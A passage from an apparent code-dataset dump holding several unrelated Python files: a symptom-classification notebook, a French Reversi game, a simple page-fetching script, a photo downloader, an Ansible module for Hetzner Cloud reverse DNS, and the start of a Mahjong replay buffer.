{"seq_id":"255409483","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[7]:\n\n\nimport pandas as pd\nimport matplotlib.pyplot as plt \nfrom sklearn import svm\nfrom sklearn import metrics\nimport joblib\nfrom sklearn.decomposition import PCA\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport seaborn as sns\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import confusion_matrix\n\n\n# In[8]:\n\n\ndataframe = pd.read_csv(r\"Downloads\\Mark2.csv\")  # raw string so the backslash is not treated as an escape\n\n\n# In[9]:\n\n\ndataframe.head()\n\n\n# In[10]:\n\n\ndataframe.shape\n\n\n# In[11]:\n\n\ndataframe.describe()\n\n\n# In[12]:\n\n\nsns.pairplot(dataframe[['cough','chest_pain','fatigue','back_pain','acidity','prognosis']],hue='prognosis')\n\n\n# In[13]:\n\n\ntrain=dataframe.drop('prognosis',axis=1)\ntrain.head()\n\n\n# In[14]:\n\n\nprognosis=dataframe.prognosis\nprognosis.head()\n\n\n# In[15]:\n\n\nX_train, X_test, Y_train, Y_test = train_test_split(train,prognosis, test_size=0.2, random_state=0)\nprint(\"X_train size ==>\", X_train.shape)\nprint(\"X_test size ==>\", X_test.shape)\nprint(\"Y_train size ==>\", Y_train.shape)\nprint(\"Y_test size ==>\", Y_test.shape)\n\n\n# In[16]:\n\n\nclf1=svm.SVC(kernel='linear')\nclf1.fit(X_train,Y_train)\nY_pred=clf1.predict(X_test)\n\n\n# In[18]:\n\n\nprint(\"Accuracy:\" ,metrics.accuracy_score(Y_test,Y_pred))\nprint(\"Precision:\",metrics.precision_score(Y_test,Y_pred,average='micro'))\n\n\n# In[19]:\n\n\nfrom sklearn.linear_model import LogisticRegression\n\n\n# In[20]:\n\n\nclf = LogisticRegression()\nclf.fit(X_train, Y_train)\nY_pred=clf.predict(X_test)\n\n\n# In[23]:\n\n\nprint(\"Accuracy:\" 
,metrics.accuracy_score(Y_test,Y_pred))\nprint(\"Precision:\",metrics.precision_score(Y_test,Y_pred,average='micro'))\n\n\n# In[24]:\n\n\nfrom sklearn.preprocessing import StandardScaler\nscaler = StandardScaler()\nscaler.fit(X_train)\n\nX_train = scaler.transform(X_train)\nX_test = scaler.transform(X_test)\n\n\n# In[25]:\n\n\nfrom sklearn.neighbors import KNeighborsClassifier\nclassifier = KNeighborsClassifier(n_neighbors=5)\nclassifier.fit(X_train, Y_train)\n\n\n# In[26]:\n\n\nY_pred = classifier.predict(X_test)\n\n\n# In[28]:\n\n\nprint(\"Accuracy:\" ,metrics.accuracy_score(Y_test,Y_pred))\nprint(\"Precision:\",metrics.precision_score(Y_test,Y_pred,average='micro'))\n\n\n# In[29]:\n\n\nimport pickle\n\n\n# In[30]:\n\n\nwith open('mark11_pickle','wb') as f:\n pickle.dump(clf1,f)\n\n\n# In[31]:\n\n\nwith open('mark11_pickle','rb') as f:\n mp = pickle.load(f)\n\n\n# In[32]:\n\n\nmp.predict(X_test)\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"DD_models/Marks11.py.py","file_name":"Marks11.py.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"87658576","text":"import datetime\nimport sys\nfrom doctest import testmod\n\nfrom upemtk import *\n\nTAILLE_CASE = 75\nTAILLE_PLATEAU = 8\n\nDIRECTIONS = [(0, 1), (1, 1), (1, 0), (1, -1), (0, -1), (-1, -1), (-1, 0), (-1, 1)]\n\nB = 1 # Blancs\nN = 0 # Noirs\nV = \".\" # Vide\nC = \"?\" # Coup possible\n\n\ndef pixel_vers_case(pixel: tuple, taille_case: int):\n \"\"\"\n Convertit les coordonées d'un pixel en coordonées d'une case du plateau.\n :param tuple pixel: Coordonées du pixel.\n :param int taille_case: Taille des cases.\n :return tuple: Coordonées de la case.\n\n >>> pixel_vers_case((100, 200), 50)\n (2, 4)\n \"\"\"\n i, j = pixel\n return i // taille_case, j // taille_case\n\n\ndef case_vers_pixel(case: tuple, taille_case: int):\n \"\"\"\n Donne le pixel au centre d'une case à partir de ses coordonées.\n :param tuple case: Coordonées de la case.\n :param int taille_case: Taille des cases.\n :return tuple: Coordonées du pixel.\n\n >>> case_vers_pixel((0, 0), 50)\n (25.0, 25.0)\n \"\"\"\n i, j = case\n return (i + .5) * taille_case, (j + .5) * taille_case\n\n\ndef init_plateau(taille: int):\n \"\"\"\n Génère une liste de listes correspondant au plateau.\n :param int taille: Longueur et largueur du plateau.\n :return list: Liste de listes d'entiers.\n\n >>> init_plateau(2)\n [['.', '.'], ['.', '.']]\n \"\"\"\n resultat = []\n for i in range(taille):\n resultat.append([V] * taille)\n return resultat\n\n\ndef dessine_plateau(plateau: list, ex_plateau: list, boutons: dict, joueur: int):\n \"\"\"\n Dessine le plateau à partir d'une liste de listes ainsi que la barre inférieure.\n :param list plateau: Liste contenant le plateau.\n :param list ex_plateau: Plateau du tour précédent.\n :param dict boutons: Dictionnaires des boutons du jeu.\n :param int joueur: Joueur actuel.\n \"\"\"\n index = 0\n y = 0\n efface_tout()\n while y < len(plateau):\n x = 0\n while x < len(plateau[y]):\n rectangle(x * TAILLE_CASE, y * TAILLE_CASE, x * TAILLE_CASE + TAILLE_CASE, y * TAILLE_CASE + TAILLE_CASE,\n tag=str(index), remplissage='darkgreen')\n x_pixel, y_pixel = case_vers_pixel((x, y), TAILLE_CASE)\n if plateau[y][x] == B:\n cercle(x_pixel, y_pixel, 9 * TAILLE_CASE / 20, remplissage=\"white\")\n elif plateau[y][x] == N:\n cercle(x_pixel, y_pixel, 9 * TAILLE_CASE / 20, remplissage=\"black\")\n elif plateau[y][x] == C:\n cercle(x_pixel, y_pixel, 9 * TAILLE_CASE / 20, 
remplissage=\"green\", couleur=\"darkgreen\")\n index += 1\n x += 1\n y += 1\n if joueur == B:\n rectangle(0, len(plateau) * TAILLE_CASE, len(plateau) * TAILLE_CASE,\n len(plateau) * TAILLE_CASE + regles['taille_barre'], remplissage=\"white\")\n texte(10, 10 + len(plateau) * TAILLE_CASE, \"Au tour des blancs\")\n if joueur == N:\n rectangle(0, len(plateau) * TAILLE_CASE, len(plateau) * TAILLE_CASE,\n len(plateau) * TAILLE_CASE + regles['taille_barre'], remplissage=\"black\")\n texte(10, 10 + len(plateau) * TAILLE_CASE, \"Au tour des noirs\", couleur=\"white\")\n boutons[\"quitter\"] = dessine_bouton(len(plateau) * TAILLE_CASE - 5,\n len(plateau) * TAILLE_CASE + regles['taille_barre'] - 5,\n \"Quitter\", ancrage='se')\n if ex_plateau is not None:\n boutons[\"annuler\"] = dessine_bouton(\n len(plateau) * TAILLE_CASE - 10 - (boutons[\"quitter\"][2] - boutons[\"quitter\"][0]),\n len(plateau) * TAILLE_CASE + regles['taille_barre'] - 5, \"Annuler\", ancrage='se')\n\n\ndef dessine_bouton(x: int, y: int, contenu: str, ancrage: str = 'nw', couleur: str = 'white', taille: int = 24,\n largeur: str = None):\n \"\"\"\n Dessine un bouton aux coordonnées renseignées.\n :param x: Abscisse du point d'ancrage.\n :param y: Ordonnée du point d'ancrage.\n :param contenu: Texte à insérer dans le bouton.\n :param ancrage: Ancrage du bouton.\n :param couleur: Couleur de remplissage du bouton.\n :param taille: Taille du texte.\n :param largeur: Chaîne de caractère déterminant la largeur du bouton.\n :return tuple: Coordonées du bouton.\n\n >>> cree_fenetre(0, 0)\n >>> dessine_bouton(0, 0, \"test\")\n (0, 0, 49, 35)\n >>> ferme_fenetre()\n \"\"\"\n if largeur is None:\n largeur = contenu\n longueur, hauteur = taille_texte(largeur, taille=taille)\n hauteur -= hauteur % 5\n if ancrage == 'nw':\n rectangle(x, y, x + longueur + 2 * 5, y + hauteur + 2 * 5, remplissage=couleur)\n texte(x + (longueur + 2 * 5) // 2, y + (hauteur + 2 * 5) // 2, contenu, ancrage='center', taille=taille)\n return x, y, x + longueur + 2 * 5, y + hauteur + 2 * 5\n elif ancrage == 'n':\n rectangle(x - (longueur + 2 * 5) // 2, y, x + (longueur + 2 * 5) // 2, y + hauteur + 2 * 5, remplissage=couleur)\n texte(x, y + (hauteur + 2 * 5) // 2, contenu, ancrage='center', taille=taille)\n return x - (longueur + 2 * 5) // 2, y, x + (longueur + 2 * 5) // 2, y + hauteur + 2 * 5\n elif ancrage == 'ne':\n rectangle(x - longueur - 2 * 5, y, x, y + hauteur + 2 * 5, remplissage=couleur)\n texte(x + (longueur + 2 * 5) // 2, y - (hauteur + 2 * 5) // 2, contenu, ancrage='center', taille=taille)\n return x - longueur - 2 * 5, y, x, y + hauteur + 2 * 5\n elif ancrage == 'e':\n rectangle(x - hauteur - 2 * 5, y - (hauteur + 2 * 5) // 2, x, y + (hauteur + 2 * 5) // 2, remplissage=couleur)\n texte(x - (longueur + 2 * 5) // 2, y, contenu, ancrage='center', taille=taille)\n return x - hauteur - 2 * 5, y - (hauteur + 2 * 5) // 2, x, y + (hauteur + 2 * 5) // 2\n elif ancrage == 'se':\n rectangle(x - longueur - 2 * 5, y - hauteur - 2 * 5, x, y, remplissage=couleur)\n texte(x - (longueur + 2 * 5) // 2, y - (hauteur + 2 * 5) // 2, contenu, ancrage='center', taille=taille)\n return x - longueur - 2 * 5, y - hauteur - 2 * 5, x, y\n elif ancrage == 's':\n rectangle(x - (longueur + 2 * 5) // 2, y - hauteur - 2 * 5, x + (longueur + 2 * 5) // 2, y, remplissage=couleur)\n texte(x, y - (hauteur + 2 * 5) // 2, contenu, ancrage='center', taille=taille)\n return x - (longueur + 2 * 5) // 2, y - hauteur - 2 * 5, x + (longueur + 2 * 5) // 2, y\n elif ancrage == 'sw':\n rectangle(x, y - 
hauteur - 2 * 5, x + longueur + 2 * 5, y, remplissage=couleur)\n        texte(x + (longueur + 2 * 5) // 2, y - (hauteur + 2 * 5) // 2, contenu, ancrage='center', taille=taille)\n        return x, y - hauteur - 2 * 5, x + longueur + 2 * 5, y\n    elif ancrage == 'w':\n        rectangle(x, y - (hauteur + 2 * 5) // 2, x + hauteur + 2 * 5, y + (hauteur + 2 * 5) // 2, remplissage=couleur)\n        texte(x + (longueur + 2 * 5) // 2, y, contenu, ancrage='center', taille=taille)\n        return x, y - (hauteur + 2 * 5) // 2, x + hauteur + 2 * 5, y + (hauteur + 2 * 5) // 2\n    elif ancrage == 'center':\n        rectangle(x - (longueur + 2 * 5) // 2, y - (hauteur + 2 * 5) // 2, x + (longueur + 2 * 5) // 2,\n                  y + (hauteur + 2 * 5) // 2, remplissage=couleur)\n        texte(x, y, contenu, ancrage='center', taille=taille)\n        return x - (longueur + 2 * 5) // 2, y - (hauteur + 2 * 5) // 2, x + (longueur + 2 * 5) // 2, \\\n               y + (hauteur + 2 * 5) // 2\n\n\ndef chercher_coups(plateau: list, joueur: int):\n    \"\"\"\n    Parcoure le plateau et recherche les coups disponibles.\n    :param list plateau: Liste contenant le plateau.\n    :param int joueur: Joueur actuel.\n    :return list: Liste des coups possibles\n\n    >>> chercher_coups([[B, B, B], \\\n                        [N, N, N], \\\n                        [V, V, B]], B)\n    [(0, 2), (1, 2)]\n    \"\"\"\n    resultat = []\n    for y in range(len(plateau)):\n        for x in range(len(plateau[y])):\n            if coup_valide(plateau, (x, y), joueur):\n                resultat.append((x, y))\n    return resultat\n\n\ndef verifier_victoire(plateau: list, joueur: int):\n    \"\"\"\n    Vérifie si un des deux joueurs remporte la partie.\n    :param list plateau: Liste contenant le plateau.\n    :param int joueur: Joueur en cours.\n    :return tuple: Numéro du joueur gagnant, 0 si le jeu continu et booléen symbolisant une victoire écrasante.\n\n    >>> verifier_victoire([[B, N, B], \\\n                           [N, N, N], \\\n                           [B, N, B]], B)\n    (0, False)\n    \"\"\"\n    compteur_b = 0\n    compteur_n = 0\n    for y, ligne in enumerate(plateau):\n        for x, case in enumerate(ligne):\n            # abs(joueur - 1) = l'adversaire (joueur vaut 0 ou 1) ; joueur * -1 ne donnait pas un joueur valide\n            if coup_valide(plateau, (x, y), joueur) or coup_valide(plateau, (x, y), abs(joueur - 1)):\n                return 0, False\n            if case == N:\n                compteur_n += 1\n            elif case == B:\n                compteur_b += 1\n    if compteur_b > compteur_n:\n        return B, abs(compteur_n - compteur_b) > 10\n    elif compteur_n > compteur_b:\n        return N, abs(compteur_n - compteur_b) > 10\n    else:\n        return None, False\n\n\ndef explore(plateau: list, case: tuple, direction: tuple):\n    \"\"\"\n    Explore une direction à partir d'une case pour lister les pions rencontrés.\n    :param list plateau: Liste contenant le plateau.\n    :param tuple case: Coordonées de la case.\n    :param tuple direction: Direction de la vérification.\n    :return list: Liste des cases.\n\n    >>> explore([[V, B, B, V], \\\n                 [B, N, N, B], \\\n                 [B, N, N, B], \\\n                 [V, B, B, N]], (0, 0), (1, 1))\n    [0, 0, 0]\n    \"\"\"\n    resultat = []\n    x_case, y_case = case[0] + direction[0], case[1] + direction[1]\n\n    explorer = True\n    while explorer:\n        if 0 <= x_case < len(plateau) and 0 <= y_case < len(plateau) and (\n                plateau[y_case][x_case] == B or plateau[y_case][x_case] == N):\n            resultat.append(plateau[y_case][x_case])\n            x_case += direction[0]\n            y_case += direction[1]\n        else:\n            explorer = False\n\n    return resultat\n\n\ndef coup_valide(plateau: list, case: tuple, joueur: int):\n    \"\"\"\n    Détermine si un coup est autorisé.\n    :param list plateau: Liste contenant le plateau.\n    :param tuple case: Coordonées de la case.\n    :param int joueur: Numéro du joueur.\n    :return bool: Le coup est autorisé.\n\n    >>> coup_valide([[V, B, B, V], \\\n                     [B, N, N, B], \\\n                     [B, N, N, B], \\\n                     [V, B, B, V]], (0, 0), N)\n    False\n    \"\"\"\n    if plateau[case[1]][case[0]] != V and 
plateau[case[1]][case[0]] != C:\n return False\n for direction in DIRECTIONS:\n ligne = explore(plateau, case, direction)\n if len(ligne) == 0:\n continue\n if ligne[0] == abs(joueur - 1) and joueur in ligne:\n return True\n return False\n\n\ndef retournement(plateau: list, case: tuple, pions: list, joueur: int, direction: tuple):\n \"\"\"\n Retourne les pions nécessaires.\n :param list plateau: Liste contenant le plateau.\n :param tuple case: Coordonée de la case.\n :param tuple pions: Liste de coordonées des pions à retourner.\n :param int joueur: Numéro du joueur.\n :param tuple direction: Direction de la ligne.\n \"\"\"\n x, y = case\n for pion in pions:\n x += direction[0]\n y += direction[1]\n if joueur not in pions:\n return\n if pion == joueur or pion == V:\n break\n elif pion == abs(joueur - 1):\n plateau[y][x] = joueur\n\n\ndef sauvegarder(plateau: list, joueur: int, nom_fichier: str):\n \"\"\"\n Sauvegarde la partie actuelle dans un fichier.\n :param list plateau: Liste contenant le plateau.\n :param int joueur: Joueur actuel.\n :param str nom_fichier: Nom de la sauvegarde à écraser.\n \"\"\"\n if nom_fichier is None:\n nom_fichier = datetime.datetime.now().strftime(\"%d-%m-%Y %H-%M\") + \".rsi\"\n fichier = open(nom_fichier, \"w\")\n\n fichier.write(str(joueur))\n for ligne in plateau:\n fichier.write(\"\\n\")\n for case in ligne:\n fichier.write(str(case))\n fichier.close()\n\n\ndef affiche_victoire(gagnant: int, ecrasante: bool):\n \"\"\"\n Affiche le message de fin de partie.\n :param int gagnant: Numéro du joueur gagnant.\n :param bool ecrasante: Victoire avec plus de 10 pions d'avance.\n \"\"\"\n if gagnant is None:\n rectangle(0, len(plateau) * TAILLE_CASE, len(plateau) * TAILLE_CASE,\n len(plateau) * TAILLE_CASE + regles['taille_barre'], remplissage=\"white\")\n texte(10, 10 + len(plateau) * TAILLE_CASE, \"Égalité !\")\n elif gagnant == N:\n rectangle(0, len(plateau) * TAILLE_CASE, len(plateau) * TAILLE_CASE,\n len(plateau) * TAILLE_CASE + regles['taille_barre'], remplissage=\"black\")\n texte(10, 10 + len(plateau) * TAILLE_CASE,\n \"Victoire \" + (\"écrasante \" if ecrasante else \"\") + \"des noirs !\",\n couleur=\"white\")\n elif gagnant == B:\n rectangle(0, len(plateau) * TAILLE_CASE, len(plateau) * TAILLE_CASE,\n len(plateau) * TAILLE_CASE + regles['taille_barre'], remplissage=\"white\")\n texte(10, 10 + len(plateau) * TAILLE_CASE,\n \"Victoire \" + (\"écrasante \" if ecrasante else \"\") + \"des blancs !\")\n\n\ndef dessine_menu(regles: dict, boutons: dict):\n \"\"\"\n Dessine le menu principal et modifie les variables de jeu.\n :param dict regles: Variables de jeu.\n :param dict boutons: Dictionnaire ou ajouter les coordonnées des boutons.\n \"\"\"\n efface_tout()\n image(TAILLE_PLATEAU * TAILLE_CASE // 2, TAILLE_PLATEAU * TAILLE_CASE // 2, \"background.gif\", ancrage='center')\n texte(TAILLE_PLATEAU * TAILLE_CASE // 2, TAILLE_CASE, \"REVERSI\", taille=50, couleur=\"black\", ancrage='n')\n\n boutons[\"nouvelle_partie\"] = \\\n dessine_bouton(TAILLE_PLATEAU * TAILLE_CASE // 2, 3 * TAILLE_CASE, \"Nouvelle partie\", ancrage='center',\n largeur=\"Afficher les coups disponibles\")\n boutons[\"charger_partie\"] = \\\n dessine_bouton(TAILLE_PLATEAU * TAILLE_CASE // 2, 4 * TAILLE_CASE, \"Charger une partie\", ancrage='center',\n largeur=\"Afficher les coups disponibles\")\n boutons[\"afficher_coups\"] = \\\n dessine_bouton(TAILLE_PLATEAU * TAILLE_CASE // 2, 5 * TAILLE_CASE, \"Afficher les coups disponibles\",\n ancrage='center', largeur=\"Afficher les coups 
disponibles\",\n couleur=\"green\" if regles[\"afficher_coups\"] else \"red\")\n boutons[\"quitter\"] = dessine_bouton(TAILLE_PLATEAU * TAILLE_CASE // 2, 7 * TAILLE_CASE, \"Quitter\", ancrage='center')\n\n\ndef clone(plateau: list):\n \"\"\"\n Retourne un clone du plateau.\n :param plateau: Plateau à cloner.\n :return: Plateau cloné.\n\n >>> clone([[1, 1, 1], \\\n [1, 1, 1], \\\n [1, 1, 1]])\n [[1, 1, 1], [1, 1, 1], [1, 1, 1]]\n \"\"\"\n clone_plateau = []\n for list in plateau:\n clone_plateau.append(list.copy())\n return clone_plateau\n\n\nregles = {'joueur': N,\n 'nouvelle_partie': True,\n 'afficher_coups': False,\n 'sauvegarde': None}\nex_plateau = None\nboutons = {}\n\nif __name__ == \"__main__\":\n\n cree_fenetre(0, 0)\n regles['taille_barre'] = taille_texte('X')[1] - taille_texte('X')[1] % 5 + 20\n ferme_fenetre()\n\n testmod()\n cree_fenetre(TAILLE_PLATEAU * TAILLE_CASE, TAILLE_PLATEAU * TAILLE_CASE + regles['taille_barre'])\n\n menu = True\n while menu:\n dessine_menu(regles, boutons)\n x, y = attend_clic_gauche()\n\n for bouton in boutons:\n if int(boutons[bouton][0]) <= x <= int(boutons[bouton][2]) and \\\n int(boutons[bouton][1]) <= y <= int(boutons[bouton][3]):\n if bouton == \"nouvelle_partie\":\n menu = False\n elif bouton == \"charger_partie\":\n regles['nouvelle_partie'] = False\n menu = False\n elif bouton == \"afficher_coups\":\n regles['afficher_coups'] = not regles['afficher_coups']\n break\n elif bouton == \"quitter\":\n sys.exit()\n\n if regles['nouvelle_partie']:\n\n regles['joueur'] = N\n plateau = init_plateau(TAILLE_PLATEAU)\n\n plateau[TAILLE_PLATEAU // 2 - 1][TAILLE_PLATEAU // 2 - 1] = B\n plateau[TAILLE_PLATEAU // 2][TAILLE_PLATEAU // 2] = B\n plateau[TAILLE_PLATEAU // 2 - 1][TAILLE_PLATEAU // 2] = N\n plateau[TAILLE_PLATEAU // 2][TAILLE_PLATEAU // 2 - 1] = N\n\n else:\n\n nom_fichier = input(\"Entrer le nom du fichier de sauvegarde : \")\n\n fichier = open(nom_fichier, \"r\")\n lignes = fichier.readlines()\n regles['joueur'] = int(lignes[0])\n\n plateau = []\n for i in range(TAILLE_PLATEAU):\n ligne = []\n for case in lignes[i + 1].strip():\n if case == str(B) or case == str(N):\n ligne.append(int(case))\n else:\n ligne.append(case)\n plateau.append(ligne)\n\n regles['afficher_coups'] = False\n for ligne in plateau:\n if C in ligne:\n regles['afficher_coups'] = True\n break\n\n fichier.close()\n regles['sauvegarde'] = nom_fichier\n\n gagnant = None\n ecrasante = False\n\n # BOUCLE PRINCIPALE\n while True:\n\n coups_dispo = chercher_coups(plateau, regles['joueur'])\n\n if regles['afficher_coups']:\n for case in coups_dispo:\n plateau[case[1]][case[0]] = C\n\n dessine_plateau(plateau, ex_plateau, boutons, regles['joueur'])\n\n if verifier_victoire(plateau, regles['joueur'])[0] != 0:\n gagnant, ecrasante = verifier_victoire(plateau, regles['joueur'])\n break\n\n if len(coups_dispo) == 0:\n rectangle(0, len(plateau) * TAILLE_CASE, len(plateau) * TAILLE_CASE,\n len(plateau) * TAILLE_CASE + regles['taille_barre'], remplissage=\"white\")\n texte(10, 10 + len(plateau) * TAILLE_CASE, \"Les \" + (\n \"blancs\" if regles['joueur'] == B else \"noirs\") + \" ne peuvent pas jouer, ils passent leur tour.\")\n mise_a_jour()\n attente(3)\n regles['joueur'] = abs(regles['joueur'] - 1)\n continue\n\n x, y = attend_clic_gauche()\n\n if boutons[\"quitter\"][0] <= x <= boutons[\"quitter\"][2] and boutons[\"quitter\"][1] <= y <= boutons[\"quitter\"][3]:\n sauvegarder(plateau, regles['joueur'], regles['sauvegarde'])\n sys.exit()\n if \"annuler\" in boutons:\n if 
boutons[\"annuler\"][0] <= x <= boutons[\"annuler\"][2] and \\\n boutons[\"annuler\"][1] <= y <= boutons[\"annuler\"][3]:\n regles['joueur'] = abs(regles['joueur'] - 1)\n plateau = clone(ex_plateau)\n ex_plateau = None\n continue\n\n for case in coups_dispo:\n plateau[case[1]][case[0]] = V\n\n x_case, y_case = pixel_vers_case((x, y), TAILLE_CASE)\n\n if pixel_vers_case((x, y), TAILLE_CASE) not in coups_dispo:\n continue\n\n ex_plateau = clone(plateau)\n plateau[y_case][x_case] = regles['joueur']\n\n for direction in DIRECTIONS:\n ligne = explore(plateau, (x_case, y_case), direction)\n retournement(plateau, (x_case, y_case), ligne, regles['joueur'], direction)\n\n regles['joueur'] = abs(regles['joueur'] - 1)\n\n affiche_victoire(gagnant, ecrasante)\n attend_fermeture()\n","sub_path":"Projet final/reversi.py","file_name":"reversi.py","file_ext":"py","file_size_in_byte":19550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"125935721","text":"'''\n使用urllib.request请求一个网页内容,并把内容打印出来\n'''\nfrom urllib import request\n\nif __name__ == '__main__':\n\n url = 'https://jobs.zhaopin.com/CZ507343230J00057937812.htm'\n # 打开相应的url并把相应页面作为返回\n rsp = request.urlopen(url)\n\n # 把返回结果读取出来\n # 读取出来内容类型为bytes\n html = rsp.read()\n\n #如果想把bytes内容转换成字符串,需要解码\n html = html.decode('utf-8')\n print(html)","sub_path":"Spider/v1.py","file_name":"v1.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"238723556","text":"# -*- coding: utf-8 -*-\n\nfrom photo_downloader2 import PhotoDownloader\nfrom photo_task_gen import PhotoTaskGenerator\nfrom photo_reader import PhotoReader\nimport threading\n\nclass Downloader(threading.Thread):\n _download_size = 10\n\n def __init__(self):\n super(Downloader, self).__init__()\n self.photo_taskGenerator = PhotoTaskGenerator()\n self.photo_reader = PhotoReader(self.photo_taskGenerator)\n\n def run(self):\n self.photo_reader.start()\n for i in range(self._download_size):\n PhotoDownloader(self.photo_taskGenerator).run()\n\nif __name__ == '__main__':\n downloader = Downloader()\n downloader.start()","sub_path":"downloader/downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"377013155","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# Copyright: (c) 2019, Hetzner Cloud GmbH \n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n\nfrom __future__ import absolute_import, division, print_function\n\n__metaclass__ = type\n\nANSIBLE_METADATA = {\n \"metadata_version\": \"1.1\",\n \"status\": [\"preview\"],\n \"supported_by\": \"community\",\n}\n\nDOCUMENTATION = \"\"\"\n---\nmodule: hcloud_rdns\n\nshort_description: Create and manage reverse DNS entries on the Hetzner Cloud.\n\nversion_added: \"2.9\"\n\ndescription:\n - Create, update and delete reverse DNS entries on the Hetzner Cloud.\n\nauthor:\n - Lukas Kaemmerling (@lkaemmerling)\n\noptions:\n server:\n description:\n - The name of the Hetzner Cloud server you want to add the reverse DNS entry to.\n type: str\n required: true\n ip_address:\n description:\n - The IP address that should point to I(dns_ptr).\n type: str\n required: true\n dns_ptr:\n description:\n - The DNS address the I(ip_address) should resolve to.\n - Omit the param to reset the reverse DNS entry to the default value.\n type: str\n state:\n 
description:\n - State of the reverse DNS entry.\n default: present\n choices: [ absent, present ]\n type: str\n\nrequirements:\n - hcloud-python >= 1.3.0\n\nextends_documentation_fragment: hcloud\n\"\"\"\n\nEXAMPLES = \"\"\"\n- name: Create a reverse DNS entry for a server\n hcloud_rdns:\n server: my-server\n ip_address: 123.123.123.123\n dns_ptr: example.com\n state: present\n\n- name: Ensure the reverse DNS entry is absent (remove if needed)\n hcloud_rdns:\n server: my-server\n ip_address: 123.123.123.123\n dns_ptr: example.com\n state: absent\n\"\"\"\n\nRETURN = \"\"\"\nhcloud_rdns:\n description: The reverse DNS entry\n returned: always\n type: complex\n contains:\n server:\n description: Name of the server\n type: str\n returned: always\n sample: my-server\n ip_address:\n description: The IP address that point to the DNS ptr\n type: str\n returned: always\n sample: 123.123.123.123\n dns_ptr:\n description: The DNS that resolves to the IP\n type: str\n returned: always\n sample: example.com\n\"\"\"\n\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible.module_utils._text import to_native\nfrom ansible.module_utils.hcloud import Hcloud\nfrom ansible.module_utils.network.common import utils\n\ntry:\n from hcloud import APIException\nexcept ImportError:\n APIException = None\n\n\nclass AnsibleHcloudReverseDNS(Hcloud):\n def __init__(self, module):\n super(AnsibleHcloudReverseDNS, self).__init__(module, \"hcloud_rdns\")\n self.hcloud_server = None\n self.hcloud_rdns = None\n\n def _prepare_result(self):\n return {\n \"server\": to_native(self.hcloud_server.name),\n \"ip_address\": to_native(self.hcloud_rdns[\"ip_address\"]),\n \"dns_ptr\": to_native(self.hcloud_rdns[\"dns_ptr\"]),\n }\n\n def _get_server(self):\n try:\n self.hcloud_server = self.client.servers.get_by_name(\n self.module.params.get(\"server\")\n )\n except APIException as e:\n self.module.fail_json(msg=e.message)\n\n def _get_rdns(self):\n ip_address = self.module.params.get(\"ip_address\")\n if utils.validate_ip_address(ip_address):\n if self.hcloud_server.public_net.ipv4.ip == ip_address:\n self.hcloud_rdns = {\n \"ip_address\": self.hcloud_server.public_net.ipv4.ip,\n \"dns_ptr\": self.hcloud_server.public_net.ipv4.dns_ptr,\n }\n else:\n self.module.fail_json(msg=\"The selected server does not have this IP address\")\n elif utils.validate_ip_v6_address(ip_address):\n for ipv6_address_dns_ptr in self.hcloud_server.public_net.ipv6.dns_ptr:\n if ipv6_address_dns_ptr[\"ip\"] == ip_address:\n self.hcloud_rdns = {\n \"ip_address\": ipv6_address_dns_ptr[\"ip\"],\n \"dns_ptr\": ipv6_address_dns_ptr[\"dns_ptr\"],\n }\n else:\n self.module.fail_json(msg=\"The given IP address is not valid\")\n\n def _create_rdns(self):\n self.module.fail_on_missing_params(\n required_params=[\"dns_ptr\"]\n )\n params = {\n \"ip\": self.module.params.get(\"ip_address\"),\n \"dns_ptr\": self.module.params.get(\"dns_ptr\"),\n }\n\n if not self.module.check_mode:\n self.hcloud_server.change_dns_ptr(**params).wait_until_finished()\n\n self._mark_as_changed()\n self._get_server()\n self._get_rdns()\n\n def _update_rdns(self):\n dns_ptr = self.module.params.get(\"dns_ptr\")\n if dns_ptr != self.hcloud_rdns[\"dns_ptr\"]:\n params = {\n \"ip\": self.module.params.get(\"ip_address\"),\n \"dns_ptr\": dns_ptr,\n }\n\n if not self.module.check_mode:\n self.hcloud_server.change_dns_ptr(**params).wait_until_finished()\n\n self._mark_as_changed()\n self._get_server()\n self._get_rdns()\n\n def present_rdns(self):\n self._get_server()\n 
self._get_rdns()\n if self.hcloud_rdns is None:\n self._create_rdns()\n else:\n self._update_rdns()\n\n def delete_rdns(self):\n self._get_server()\n self._get_rdns()\n if self.hcloud_rdns is not None:\n if not self.module.check_mode:\n self.hcloud_server.change_dns_ptr(ip=self.hcloud_rdns['ip_address'], dns_ptr=None)\n self._mark_as_changed()\n self.hcloud_rdns = None\n\n @staticmethod\n def define_module():\n return AnsibleModule(\n argument_spec=dict(\n server={\"type\": \"str\", \"required\": True},\n ip_address={\"type\": \"str\", \"required\": True},\n dns_ptr={\"type\": \"str\"},\n state={\n \"choices\": [\"absent\", \"present\"],\n \"default\": \"present\",\n },\n **Hcloud.base_module_arguments()\n ),\n supports_check_mode=True,\n )\n\n\ndef main():\n module = AnsibleHcloudReverseDNS.define_module()\n\n hcloud = AnsibleHcloudReverseDNS(module)\n state = module.params[\"state\"]\n if state == \"absent\":\n hcloud.delete_rdns()\n elif state == \"present\":\n hcloud.present_rdns()\n\n module.exit_json(**hcloud.get_result())\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"env/lib/python3.9/site-packages/ansible/modules/cloud/hcloud/hcloud_rdns.py","file_name":"hcloud_rdns.py","file_ext":"py","file_size_in_byte":6766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"12899423","text":"import numpy as np\nimport random\n\nclass SimpleMahjongBuffer():\n\n def __init__(self, size=10000):\n self.size = size\n self.s = np.zeros([size, 34, 4, 1], dtype=np.float32)\n self.sp = np.zeros([size, 34, 4, 1], 